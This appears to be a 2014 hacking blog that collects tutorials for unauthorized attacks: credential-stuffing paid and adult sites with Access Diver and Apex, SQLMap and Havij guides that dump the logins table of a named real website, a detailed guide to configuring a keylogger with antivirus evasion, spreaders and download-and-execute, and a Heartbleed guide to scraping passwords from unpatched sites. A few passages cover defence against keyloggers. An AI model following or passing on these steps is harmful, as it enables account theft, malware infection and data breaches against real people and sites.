Thursday, 15 May 2014

Tutorial To Crack XXX Sites With Access Diver


Lists that you need to have before you get started:

1. Combo List

Click Here

2. Proxy List
Use software like ProxyFire(Easily Available Google It)

Let's begin:
First Of all You need to download a program called "AccessDriver" (You can get in google)

Download, Install and run it.
On the top menu there's an option called "my skill".Change it to "Expert"
After that, some new options will be added to it.

Now go to the middle of program and click on "Settings",
Click the following options:

1. "Let a BOT retries once again on abnormal replies (4xx/5xx)"2. "Always force a security test to begin"3. "Never Stop - continue until the end" (on the right)
Now, It is set.
Main Work Start Here

Load your proxy list, Click on the icon on the left (the one that looks like a folder),
And then go to the directory where you saved your proxy list,choose your list and click "Open".

After loading the list, click on the "Speed/Accuracy Tester" button and wait for the test to finish.
You can watch the test's progress by watching the main progress bar (on top).

Now you have to save all of the highlighted (working) proxies.
Do it by clicking on the diskette icon (over the list, on the left),
and choose to save the list to a file.
That's it, you're done checking the proxies!

Ok, now move to second main point, Enter the "Dictionary" tab, and then click on the "Load a combo file" button,
and load your word list.

Now, look up where it says "Test speed"; there's a scale with a the number 50 beside it.
this number indicates the number of bots that you use, and it affects your cracking speed.Make it more or less. (Depends On Your Internet Speed)

Now we have finished loading proxies and combo list.
In order to crack a site, you will need its members' url, any other url won't do.
Knowing the members' url is a must if you wish to crack a site.
The members' url is password protected , When the site asks you for a username/password,
The you got the right url.

After you have copied the site's members' url, make sure that everything is set correctly;
the word list has to be loaded, your proxies have to be checked, and double-check on your settings.
Let the cracking begin! click on the most left button on top, the one that says "Standard".
look at the progress bar on top for an indication on the cracking progress!
All of the password which you crack will be saved in the "History" tab.
If you don't want to get into trouble, you must remember the following: NEVER attempt to crack a site without WORKING proxies, or WITH UNTESTED proxies!


MAYBE I WROTE SOMETHING THAT CAN'T BE SHOWED LIKE IMAGES, but just follow the steps !
Enjoy.

Accounts Cracking - Apex Method


It is time to learn cracking all the other sites such as rapidshare, megaupload, hotfile, deposit files, easy-share, steam accounts etc.

We are going to use a tool developed by Buddha named Apex.

So the principle is pretty much the same:
Load a user list, pass list, proxy and crack it.

So we will begin by downloading apex


After extracting open it up:-
[Image: bqvzymyvwspcokpe.jpg]


1) Load a good userlist.

2) Load a pass list or you can use the "Same pass as user", which will try to crack with the same username. For example, "provirus = provirus"

3) Load a good proxy list.

4) Now goto cracking settings and select the site you want to crack. For example i have selected rapidshare and it gives me a message box saying that i have to use proxy inorder to crack them.
[Image: nfapqbgyqxixgapj.jpg]

5) Now goto user pass options and keep the below settings.
[Image: filcxzhibjezldbv.jpg]

6) Now click on start cracking.

7) Goto proxy list and click "Send" on the valid proxy list after checking all the proxies.

8) Keep it minimuzed and you will see lots of cracked accounts.

9) Use a checked to scan the details of the account.

You have lots of sites pre-configured by me with this package.
The below sites can be cracked with Apex:-

Code:
[*]RapidShare
[*]Megaupload
[*]Netload
[*]Deposit Files
[*]uploaded.to
[*]Hotfile
[*]Badongo.com
[*]Easy-Share
[*]zShare
[*]Cam4
[*]SendSpace
[*]ImLive
[*]FileFactory
[*]MediaFire
[*]MyFreeCams
[*]storage.to
[*]Islandor
[*]Tube8
[*]Koostube
[*]BrazzersReel
[*]Pornhub
[*]MegaPorn
[*]FileList
[*]FreakShare
[*]KeezPremium
[*]RedtubePremium
[*]RealityKings
[*]Naked.com
[*]Brazzers
[*]Webcams
[*]Flirt4Free
[*]NeonCams
[*]ShareCash
[*]FileDropper
[*]DivxDen
[*]AppScene
[*]Sky Sports Forums
[*]HotCDKey
[*]DirectGameKeys
[*]Steam

You can request if you want the configuration of any particular site.

Monday, 12 May 2014

Top 15 Hacking | Cracking | Pentesting Tools of 20...




Hello All today i am going to give you the 15 Hacking or Cracking tools of 2013. These tools are best of the 2012 and take it to the 2013 for the best hacking tools. These tools considering the all hacking areas and cracking passwords and lot of exploits. Using these tools you will be great hacker in 2013 :) ( based on how you using this ).
So guys just enjoy by reading this post and don't forget to download this tools. I provided the 15 tools downloading links . Just download and Try it. The Tools are follows .. :)

15 Hacking tools:

1. PWN STAR

A bash script to launch the AP, can be configured with a variety of attack options. Including a php script and server index.html, for phishing. Can act as a multi-client captive portal using php and iptables. Exploitation classics such as crime-PDF, De-auth with aireplay, etc..



General Features:

Managing Interfaces and MAC Spoofing
Set sniffing
Phishing Web
Karmetasploit
WPA handshake
De-auth client
Managing Iptables

Download This PWN Star

2. ZED ATTACK PROXY (ZAP)

(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.



Key Features:

Intercepting Proxy
Active scanners
Passive scanners
Brute Force scanner
Spider
Fuzzer
Port Scanner
Dynamic SSL certificates
API
Beanshell integration

ZAP Download Here:


3. SET (SOCIAL ENGINEERING TOOLKIT)

Tools that focus on attacking the human element of weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.



Key Features:

Spear-Phishing Attack Vector
Java Applet Attack Vector
Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web Jacking Attack Method
Multi-Attack Web Vector
Infectious Media Generator
Teensy USB HID Attack Vector

Download Social Engineering Toolkit here:

4. BURP SUITE

Burp Suite is a very nice tool for web application security testing. This tool is great for pentester and security researchers. It contains a variety of tools with many interfaces between them designed to facilitate and accelerate the process of web application attacks.



General Function:

Interception proxies
Radar and spiders crawling
Webapps scanner
Tool assault
Repeater and sequencer tools

Burp Suite Download Here:

5. ETTERCAP

Ettercap is a multipurpose sniffer / interceptor / logger for Local Area Network . It supports active and passive dissection of many protocols (even in code) and includes many feature for network and host analysis.



General Function:

To capture traffic and data
To do logging network
Etc.

Download Ettercap Here:

6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware Appliance that can be configured with all the requirements to perform a detailed digital forensic. Compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on the Ubuntu base with many additional tools and capabilities that are used in modern forensic technology.



General Function SIFT:

iPhone, Blackberry, and Android Forensic Capabilities
Registry Viewer (YARU)
Compatibility with F-Response Tactical, Standard, and Enterprise
PTK 2.0 (Special Release - Not Available for Download)
Automated Generation Timeline via log2timeline
Many Firefox Investigative Tools
Windows Journal Parser and Shellbags Parser (jp and sbag)
Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)
Complete Overhaul of Regripper Plugins (added over 80 additional plugins)

Download the SANS Investigative Forensic Toolkit (SIFT) here:

7. WIRESHARK

Wireshark is the most widely used and most popular in the world the protocol analyzer, and is the de facto standard across many industries and educational institutions to analyze the network in different protocol.



General Function:

Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read / write many different capture file formats
Etc.

Download Wireshark Here:

8. WEBSPLOIT

WebSploit is an Open Source Project for Remote Scan and Analysis System of the weaknesses in web applications.



Key Features:

[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan, Target Used Crawler From Metasploit WMAP plugin
[+] format infector - inject the payload into reverse and bind file format
[+] phpmyadmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] admin finder
[ +] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] Dos ARP Attack
[+ ]'s Killer Attack
[+] Attack Fake Update
[+] Fake Access Point Attack

Download WebSploit Framework here:

9. WINAUTOPWN

WinAutoPWN is a tool that is used to exploit the Windows Framework directly, so that we are automatically going to be an administrator on the windows. Widely used by "Defacer" Indonesia to deface the Windows Server



Download WinAutoPWN Here:

10. HASHCAT

Hashcat are a variety of tools to crack passwords in encrypted, it is very powerful for password recovery.



General Function:

Multi-Threaded
Free
Multi-Hash (up to 24 million hashes)
Multi-OS (Linux, Windows and OSX native binaries)
Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
SSE2 accelerated
All Attack-Modes except Brute-Force and Permutation can be extended by rules
Very fast Rule-engine
Rules compatible with JTR and PasswordsPro
Possible to resume or limit session
Automatically recognizes recovered hashes from outfile at startup
Can automatically generate random rules
Load saltlist from an external file and then use them in a Brute-Force Attack variant
Able to work in an distributed environment
Specify multiple wordlists or multiple directories of wordlists
Number of threads can be configured
Lowest priority threads run on
30 + Algorithms is implemented with performance in mind
... and much more

Download HashCat Here:

11. UNISCAN

Uniscan is a scanner for web applications, written in perl for Linux. Currently Uniscan version is 6.2.



General Function:

Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests ( HTTPS ).
Proxy support.
Generate site list using Google.
Generate site list using Bing.
Plug-in support for Crawler.
Plug-in support for dynamic tests.
Plug-in support for static tests.
Plug-in support for stress tests.
Multi-language support.
Web client.

Download Uniscan Here:

12. OLYYDBG

OllyDbg is a 32-bit assembler debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source code is not available.



General Function:


Intuitive user interface, no cryptical commands
Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
Directly loads and debugs DLLs
Object file scanning - locates routines from object files and libraries
Allows for user-defined labels, comments and function descriptions
Understands debugging information in Borland ® format
Saves patches between sessions, writes them back to executable file and updates fixups
Open architecture - many third-party plugins are available
No installation - no trash in registry or system directories
Debugs multithreaded applications
Attaches to running programs
Configurable disassembler, supports both MASM and IDEAL formats
MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions
Full UNICODE support
Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
Recognizes complex code constructs, like call to jump to procedure
Decodes calls to more than 1900 standard API and 400 C functions
Gives context-sensitive help on API functions from external help file
Sets conditional, logging, memory and hardware breakpoints
Traces program execution, logs arguments of known functions
Shows fixups
Dynamically traces stack frames
Searches for imprecise commands and masked binary sequences
Searches whole allocated memory
Finds references to constant or address range
Examines and modifies memory , sets breakpoints and Pauses program on-the-fly
Assembles commands into the shortest binary form
Starts from the floppy disk

OllyDbg Download Here:

13. BBQSQL

BBQSQL an Opensource SQL injection tools with the framework specifically designed to carry out the process in hyper fast, database agnostic, easy to setup, and easy to modify. This is another amazing release from Arsenal Blackhat USA 2012. When conducting security assessments of applications, we often find that it is difficult to SQL vulnerabilities exploitable, with this tool will be extremely easy.

BBQSQL written in the Python programming language. This is very useful when complex SQL injection attack vulnerabilities. BBQSQL also a semi-automated tool, which allows little customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI for setting up the attack much easier.



General Function:

SQL Injection Tools
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies
Download BBQSQL Here:

14. CRYPTOHAZE

Tools to crack password / hash where cryptohaze supports CUDA, OpenCL , and the CPU code (SSE, AVX, etc.). Can run on OS that support CUDA. These are intended to make it easier to pentester did crack the hash.



General Function:

Crack various kinds of hash
Showing results from crackhash
Cracking on various OS platforms

Download Cryptohaze Here:

15. SAMURAI WEB TESTING FRAMEWORK (SWTF)
SWTF is used to do testing / pentest against web application, is used to find a weakness and exploited to perform web. Very comprehensive and widely used in the world, including one used by staff binushacker



General Function:

Web Scanner
Web Mapping
Web Exploitation

Download The Samurai Web Testing Framework:

So here is the list of 15 security tools of 2013. So i hope you guys like this. Try this if any doubt mention it in comment .

Happy Hacking .. :)

Sunday, 11 May 2014

How To Use SQLMap


This is for windows. if you have windows 7/Vista you just need download Sqlmap Click Here To Download

If, you have Windows XP you have to download Python here:
Click Here To Download [DOWNLOAD VERSION 2.7.6]

1- Extract .rar file to C:

2- Open your cmd and type: cd\
[Image: xh19y4uzy8vt4kjd1em3.png]

3-Now, type: cd sqlmap\
[Image: qn7d5jpjycvf4uh6b12u.png]

4- Type: sqlmap.py -u http://site.com/index.php?id=1 --dbs
In "http://site.com/index.php?id=1" you type the site you want, but site have to be vulnerable. I will use www.parkhotel.pt/nm_quemsomos.php?id=144
It will give you the dbs of site "Database"


5- Now, normally will appeare in dbs "information_schema" that DB don't have anything don't try dump that.. I have 2 dbs, "information_schema" and "parkhotel" i will type sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel --tables \\Explain:"-D parkhotel" why i don't put --dbs, because im not trying to find dbs "--dbs is to find the dbs", and -D is a sign i already have DB.
[Image: t5h72pdy1ayhi58uwxr.png]

6- I already have the tables .. like you see down here .. Now type this: sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel -T logins --columns (i choose logins table) this code will give you the collumns of table
[Image: s6waj6n2w70c4eea3ht3.png]

7- Finally i will dump the collumns with command: sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel -T logins -C username --dump
[Image: 2fnp27617w8p6faw18y.png]

If you need help with something, comment here

Thursday, 8 May 2014

Best Way For SQL Injection And DUMP With SqlMap On Windows.


==========Stuff==========

Havij 1.15
Havij 1.15.rar
SQLMap :
SQLmap.zip
Python 2.7 :
Python DOWNLOAD
Gr3enox exploit scanner :
Scanner.rar

==========Sql injection==========
1.===Vulnerable website===

Gr3enox Exploit scanner :

What is this program :

Gr3enox exploit scanner , is an exploit scanner.
This tool will find for you all vulnerable website with your dork SQL/XSS...
How to use it :

-Launch Gr3eNox Exploit Scanner V1.1.exe
-Add your dork [ In this tutorial i will use : "index.php?cid=" ]
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
-You can add custom domain..
-And press on search

***SEARCH DONE***
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


-Ok now press on "Start" and he will give you all vulnerable websites

***SCAN DONE***

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

==========Havij 1.15==========

-Now you have your vulnerable website.
-Open havij
-Put your vulnerable website
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

-And click on Analyze ( I used other website , the link i added was not vulneralbe)
-DB FOUND ! , Go in Tables section.
-Click on DBS To see if there is more database.
-Yes+4 DBS !

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

- Now select a DBS , Or all DBS and click on "GET TABLES" And wait.
- I found tables user , I select it , and i click on "GET COLUMNS".
- now i have "email" and "pass" columns , with 11k in it.
- Let's open SQLMAP to dump ! (on windows).


==========SQLMap==========

-Open CMD
- do : cd c:/sqlmap (my folder is named sqlmap"
- do : sqlmap.py -u vulnwebsite.com/lol.php?id= --dbs

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

-they give you same dbs on havij , check on havij , and look which dbs got "User" tables.
-when you found , go on SQLmap , and do : sqlmap.py -u vulnwebsite.com/lol.php?id= -D databasenamehere --tables
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

-now you have all tables , do that to get tables column sqlmap.py -u vulnwebsite.com/lol.php?id= -D databasenamehere -T tablesname --columns

ok now you have columns , to get all data just do :
sqlmap.py -u vulnwebsite.com/lol.php?id= -D databasenamehere -T tablesname -C Email,Password --dump.

AND YOU GET ALL DATA :
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

-All data are saved in log.

Keyloggers - The Complete Tutorial



There are many ways you can hack a computer - RATs, Keyloggers, bots and Password Stealers.
In this tutorial I will teach you how to set up your own Keylogger and also protect yourself against them.

What is a Keylogger?
A keylogger is a program that records a persons keystrokes (everything they type) and send the logs back to the the hacker by either email of FTP.
Good keyloggers also detail what program the keystrokes were typed into.

Settings :
For this tutorial I will be using images from Unknown Logger V 1.3.3 as I believe that it is very thorough logger but there are many free keyloggers
which I will link in another section.

Note: We will be going from the top left going down

There are two ways that you can receive your keylogs email or FTP.

Email :

With email I recommend you create a two new email addresses (one for sending and one for receiving) and not to use your personal email.
Gmail is usually what people use as it can hold lots of logs and is secure if you have the settings right.
Email Address: you put your email address into that, obviously.
Password: you put in the password of your keylogger email. I recommend your new email address has a different email than your personal email address
because if you have it as your recovery email they can see the address and login with the same pass.
SMTP Server: is where you get your email. So for Gmail it would be smtp.gmail.com and for Hotmail it would be smtp.live.com . You can search for these if you are not sure.

Logs Sent To:

you put where the logs will be sent to. You could set this as the same email address you used in the first field but this would be less secure and you would be much safer having them sent to a different email with a different pass.
Port: this is the SMTP port. For Gmail this port is 587. You should look up what port your email provider uses.

FTP :

For FTP you need an FTP server. There are many sites that offer FTP  Like Site-1 or just go here: Site-2
Username: Your FTP Username (you will be given this)
Password: You will be given this or asked to make one depending on host
URL: This is the FTP address where it will save logs. You will be given the address by your host.

I would advise you to test these. Lots of keyloggers offer you a button to test.

Icon :

Icons add to your servers credibility.
Location: you put the address of the icon you want to use here. If you are going to be crypting or binding there's no need.

File Pumper :

File Pumpers increase the size of the server file. This is used to make it more believable.
Add: here you put how many KB/MB/GB you want to increase your file by.
In: Here you select what format the number you had in the Add box was in (KB, MB or GB). KB stand for Kilobytes and would be used for very small amounts. MB stands for Megabyte and would be best if you are say, binding it with a song. Songs are usually 4-6MB. GB stands for Gigabytes and would be used for huge files like Adobe C26 Suite would be 200GB or more.

Send Logs Time Interval :

This is important. This is how often you want the logger to send keylogs. Don't set it too small because you would just get lots of very short logs, and don't set it too high to say 2 hours as your victim mightn't use the PC for that long and it would never get sent. Best setting would be 30-60 mins.
Server: just the name that it will put in the file it outputs.
The checkbox is self-explanatory.

Antis :

These disable or make your server undetectable to antiviruses and sandboxes and other forms of security. It varies from program to program what way the antis work. I would advise enabling these as they allow your keylogger to be on the computer for longer.

Spreaders :

These are methods of infecting more computers using your victims computer. They operate by infecting files sent on P2P programs (Limewire, Shareaza, Emule, Bearshare etc.), infecting USB drives (USB), sending files over LAN (LAN), infecting specific filetypes (Rar, Zip) sending files of chat and messaging applications (Outlook, Omegle, MSN, Yahoo, Skype, ICQ) and other methods.
Spreaders are always handy for getting more victims with little effort as it uses your victims computer power rather than your time and energy.

Stealers :

Stealers take logins and keys for various programs. They make the process of taking usernames and passwords a lot quicker as you won't need to search through endless logs.

Fake Message :

Possibly the silliest feature (yet for some reason every RAT and Keylogger has one) and one I would advise you not to use it. Basically what it does is bring up a fake error message on your victims PC. If you do use this it will be quite obvious to the user that their PC is infected and they will remove your keylogger.
Webcam Logger :

This will take pictures/video with the webcam on the victims PC if they have one. Set the interval the same as the logs interval before if you want to use it.

Screen Logger :

This will take screenshots of the victims screen every period of time. Set it the same as logs too if you want to use it. If it is set too low you will have too much data.

Clipboard Logger :

This saves text that the victim copies to the clipboard. So basically every thing copy is saved.

Download and Execute :

It is very important that you have this on every keylogger or RAT that you use. It allows you to install another keylogger or RAT on your victims PC. This mean that you can change to a different RAT or keylogger later or give some victims to a friend or what not.
Add link(s) to places where you can put a file to download and execute if you ever need it eg: Click Here OR you can make a shortened link at ******* and direct it to your server when you need it.

Webpage Loader/Ad Visitor :

This opens webpages and ads. Its obvious and would alert your victim that they are infected. You would use affiliate links and other methods to get money from this feature.

Run at Startup :

It will start the keylogger on start up. Tick it no matter what.

Melt :

This deletes the server file once it has infected the PC.
Mutex :

Click + several times. This helps make it more undetectable.
Text to Speech :

This will play a message using Windows text-to-speech feature when server is installed. Similar to Fake Message it alerts the victim that they are infected and has no benefit so I advise you not to use it

Assembly Changer :

This changes the Assembly Information on your file. If you go to the properties of any file on your computer and go to Properties>Assembly you will see information about the file. That's what the Assembly Changer changes.

Cookie Deleters :

These are brilliant! If your victim has saved their passwords for different sites they wont need type them in and your keylogger wont get them so what this does is delete their cookies so that they have to login again.

Website Blocker :

This blocks websites. The options given in this picture block Virus scanning websites but you can add other sites too.

Disablers :

These disable different windows features on the victims computer so that it is harder for them to remove your virus. If your victim is savvy they will notice this straight away and remove the keylogger very quickly. I wouldn't use these except maybe Disable system restore, disable registry tools and disable registry as these are not used as often and wouldn't be noticed.

What Next?

Worming
Worms make your victim spread your virus to his contacts and whatever the plug their USB stick into etc. Our example above had worm options (spreaders) but not every keylogger, RAT etc have worm/spreading options.

Crypting :

Crypting is important if you want to get lots of victims and keep them for a long time. It makes your server undetectable to Anti-viruses.
FUD stands for Fully-undetectable and UD stands for Un-Detectable. FUD crypters are the best especially private ones.

Binding :

Binding is when you bind your server with another file or program. It is very useful for spreading. You would bind your server with chessgame.exe (for example) and say "Hey check this cool game out!" and when they open it the game will open but so will the RAT. The victim would be none the wiser on whether they were infected or not whereas they would be suspicious if nothing opened.

Spreading :
These are methods of getting victims for your keylogger. You should get a few and use them as effectively as possible.

How do I Protect Myself Against Keyloggers?

Having an Anti Virus would be a start! Obviously be careful with what you download too.
There is a tool that I think works very well against keyloggers.
Its is called KeyScrambler. Whenever you type something it randomizes it so that if a keylogger has infected your PC they would just get logs of jumbled numbers, letters and symbols.
You can get KeyScrambler here: Click Here To Download
The Official Site: Click Here

If you don't want to use keyscrambler there is also Zemana Anti-Keylogger

How To Reverse Engineer a Keylogger :

This is my favorite part. If you know your PC is infected or a file is infected you can get the email login or FTP login from the server. People also go "whaling" and download obvious viruses from youtube to steal lots of keylogs and slaves from skids.
There are two ways to do this and I will explain both below.

Wireshark :
1. Download and install WireShark if you do not already have it: http://www.wireshark.org/download.html . While it is installing make sure Winpcap gets installed with it.
2. If you have an infected file and are not yet infected then open it in SandBoxie or VirtualBox or VMWare and follow these steps within the virtual machines. If you are already infected you can skip to the next step.
3. Once it is installed open it up and click "Capture" on the top menu and select the interface - if you are following in a virtual machine select that otherwise select windows or your network card.
4. Leave it on like that for about half an hour. This is to make sure the keylogger actually does connect back while you are capturing packets. (refer back to "Time Intervals")
5. When it is done you need to filter through the results for the FTP or email login. Type "FTP" in the filter box and search. If a login comes up for that then they have used an FTP server to take your keylogs. If not try "SMTP" to search for email login.
If this dosen't work then either -
the keylogger hasn't connected back
You did something wrong
You are not infected
6. Now that you have their login details you can take all their keylogs and delete their keylogs of you. Then just change the password so they no longer have access Big Grin

BinText :

1. Download BinText here: Click Here To Download
2. Open BinText and drag the infected file into the BinText window.
3. Now search through it for "hotmail" "gmail" "yahoo" "ftp" etc.
4. Self-explanatory amirite?

Heartbleed Tutorial [Full Tutorial and Explanation] | CVE-2014-0160


Introduction:
"Heartbleed is a security bug in the open-source OpenSSL cryptography library, which is widely used to implement the Internet's Transport Layer Security (TLS) protocol. This vulnerability, classified as a buffer over-read, results from a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension, the heartbeat being behind the bug's name."
The explanation of heartbleed taken from Click Here

In other words Heartbleed is a vulnerability that pretty much allows you to obtain data being sent allowing you to obtain information like usernames,passwords,emails,etc.

Which Sites Are Vulnerable:
When this exploit first came out (April 3, 2014) every site using SSL was vulnerable to this causing a very big problem for even the biggest of sites. At 1 point sites like google,tumblr,etc were vulnerable but most big sites have been patched a hour or a day into the discovery.

Due to this being a old exploit it is mostly patched on all SSL sites but can still be abused on 100's of websites.

These SSL version are at the moment vulnerable and patched:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

To find a site that is vulnerable download the following plugins on your web browser:
Chrome Bleed:         Chrome Bleed Link
Firefox Heartbleed:  Firefox Bleed Link

You may also use 1 of these 2 sites:
Mcafee
Filippo

To find vulnerable websites try using this dork in a google search:
inurl:https://
If you wanna target a certain type of site just type in a keywoard before the dork I provided. For example:
hunting inurl:https://

How To Exploit Sites:
Found a site? Well now lets find out how to exploit it and be rolling in the accounts. First download Bleedout. This program allows you to exploit sites. Put this in a folder as it does create many log files.

Open CMD and type in "CD C:\Users\(Your Computer Username)\Desktop\Bleedout" In other words just do "CD" command and type in the directory bleedout is located in. After type "bleedout" for info on how to use it or just read what I am about to type up. Type in "bleedout -h (domain name without http://)". Then let this run for hours.

After a while check in the folder there will be a text file which will have all the scraped info. Open the text file then press "CTRL + F" and type in password. It will show you some results just look through them and try the logins out. Thats it, you will have a list of accounts soon enough. Ignore the random text that will be generated, this can be used to obtain a SSL private key but either then that they are just replies from the host.

The official site of heartbleed is: http://heartbleed.com/